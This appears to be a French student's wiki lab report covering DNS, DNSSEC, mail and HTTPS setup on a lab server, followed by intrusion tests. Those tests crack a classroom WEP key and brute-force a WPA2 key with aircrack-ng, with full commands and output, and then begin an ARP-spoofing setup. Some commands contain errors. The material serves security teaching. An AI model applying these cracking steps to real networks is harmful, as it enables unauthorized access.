Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
Premièrement, on ajoute &amp;lt;code&amp;gt;l'obtion dnssec-enable yes;&amp;lt;/code&amp;gt; dans le fichier &amp;lt;code&amp;gt;named.conf.options&amp;lt;/code&amp;gt;.&lt;br /&gt;
====Génération des clef asymétrique====&lt;br /&gt;
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.&lt;br /&gt;
pour commancer, on crée un repertoire pour stocker les clef.&lt;br /&gt;
  cd /etc/bind&lt;br /&gt;
  mkdir glopglop.site.dnssec&lt;br /&gt;
  cd glopglop.site.dnssec/&lt;br /&gt;
&lt;br /&gt;
Une fois dans le dossier &amp;lt;code&amp;gt;glopglop.site.dnssec&amp;lt;/code&amp;gt;, on crée les clefs avec la commande&amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair...............+++++ ..........................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+15337&lt;br /&gt;
&lt;br /&gt;
On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande &amp;lt;code&amp;gt;dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
On obtien : &lt;br /&gt;
 Generating key pair................+++++ ..................................................+++++ &lt;br /&gt;
 Kglopglop.site.+005+55608&lt;br /&gt;
&lt;br /&gt;
On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.&lt;br /&gt;
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);&lt;br /&gt;
&lt;br /&gt;
 mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key&lt;br /&gt;
 mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private&lt;br /&gt;
 mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key&lt;br /&gt;
 mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;code&amp;gt;db.glopglop.site&amp;lt;/code&amp;gt; on ajoute les deux lignes ci-dessous : &lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key&lt;br /&gt;
 $include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe la zone d'enregistremment avec la commande &amp;lt;code&amp;gt;dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.&lt;br /&gt;
pour obtenir la cled on utilise la commande &amp;lt;code&amp;gt;cat glopglop.site-ksk.key&amp;lt;/code&amp;gt; on obtien le résultat ci-dessous : &lt;br /&gt;
 ; This is a key-signing key, keyid 15337, for glopglop.site.&lt;br /&gt;
 ; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 ; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)&lt;br /&gt;
 glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=&lt;br /&gt;
&lt;br /&gt;
On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.&lt;br /&gt;
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.&lt;br /&gt;
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.&lt;br /&gt;
&lt;br /&gt;
===Installation d'une méchagerie===&lt;br /&gt;
====Configuration de Postfix====&lt;br /&gt;
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous : &lt;br /&gt;
 apt-get install postfix&lt;br /&gt;
 ant-get install mutt&lt;br /&gt;
&lt;br /&gt;
A l'installation de 'postfix' un fenètre de configuration s'ouver. &lt;br /&gt;
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'&lt;br /&gt;
&lt;br /&gt;
On vérifie la configuration de 'postix' en allant dans le 'main.cf'&lt;br /&gt;
 vi /etc/postfix/main.cf &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'&lt;br /&gt;
 service postfix restart&lt;br /&gt;
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande &amp;lt;code&amp;gt;dpkg-reconfigure postfix&amp;lt;/code&amp;gt;&lt;br /&gt;
====Réception d'un message====&lt;br /&gt;
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'&lt;br /&gt;
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande &amp;lt;code&amp;gt;mutt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On constate que on resoit bien les message en provenance du mail de Polytech.&lt;br /&gt;
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'&lt;br /&gt;
&lt;br /&gt;
Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande &amp;lt;code&amp;gt;admin:root&amp;lt;/code&amp;gt;&lt;br /&gt;
On crée ensuite un &amp;lt;code&amp;gt;newaliases&amp;lt;/code&amp;gt; puis on restarte bind9 avec la commance &amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.&lt;br /&gt;
&lt;br /&gt;
====Envoie du SSL Certification Gandi====&lt;br /&gt;
&lt;br /&gt;
Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.&lt;br /&gt;
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.&lt;br /&gt;
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
quand on utilise le ssh on passe par le port '442' dans le fichier &amp;lt;code&amp;gt;/etc/apache2/sites-available/default-ssl.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
On ajoute les lignes suivantes : &lt;br /&gt;
&lt;br /&gt;
 SSLEngine on&lt;br /&gt;
 SSLCertificateFile /root/glopglop.site.crt&lt;br /&gt;
 SSLCertificateKeyFile /root/myserver.key&lt;br /&gt;
 SSLCertificateChainFile /root/GandiStandardSSLCA2.pem &lt;br /&gt;
&lt;br /&gt;
On reboot le service apash2 pour qu'il prenne les modification en compte.&lt;br /&gt;
Le service ne fonctionn pas encore car on a rien qui écoute le port 442. &lt;br /&gt;
 /etc/apache2/sites-available/default-ssl.conf &lt;br /&gt;
 dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
Il ne faut pas oublier d'incrémenter le numéro de version avant de restart le service 'bind9'&lt;br /&gt;
&lt;br /&gt;
On vérifie que tout fonctionne bien avec les commandes : &lt;br /&gt;
 host www.glopglop.site&lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
  &lt;br /&gt;
 host www.glopglop.site ns6.gandi.net&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: ns6.gandi.net&lt;br /&gt;
 Address: 2001:4b98:d:1::40#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 &lt;br /&gt;
 www.glopglop.site is an alias for dns1.glopglop.site.&lt;br /&gt;
 dns1.glopglop.site has address 193.48.57.168&lt;br /&gt;
&lt;br /&gt;
On peut maintenant vérifier que le site est maintenant bien sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Glopglop.site_Securisé.png|1000px|thumb|left|GlopGlop.site en Https]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on a maintenant un site sécurisé en 'https'&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Description ===&lt;br /&gt;
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA &lt;br /&gt;
&lt;br /&gt;
=== Installation de la clef Wifi ===&lt;br /&gt;
Avec la commande &amp;lt;code&amp;gt;lsusb&amp;lt;/code&amp;gt; on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.&lt;br /&gt;
&lt;br /&gt;
 Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter&lt;br /&gt;
 Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub&lt;br /&gt;
 Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
 Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard&lt;br /&gt;
 Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse&lt;br /&gt;
 Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub&lt;br /&gt;
 Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub&lt;br /&gt;
&lt;br /&gt;
La clef ubs Wifi est bien détécter.&lt;br /&gt;
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :&lt;br /&gt;
 apt-get install firmware-ralink&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande &amp;lt;code&amp;gt;ip l&amp;lt;/code&amp;gt; et on récupère le résultat ci-dessous : &lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 5: bridge: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 6: vmnet1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 7: vmnet8: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
 8: wlx40a5ef059784: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000&lt;br /&gt;
    link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
&lt;br /&gt;
La clef wifi s'apelle donc &amp;lt;code&amp;gt;wlx40a5ef059784&amp;lt;/code&amp;gt; on fait maintenant un &amp;lt;code&amp;gt; ip link set wlx40a5ef059784 up&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec la comande &amp;lt;code&amp;gt;dmsg&amp;lt;/code&amp;gt; on vérifie que la clef wifi fonctionne bien. &lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
 apt-get install firmware-misc-nonfree&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
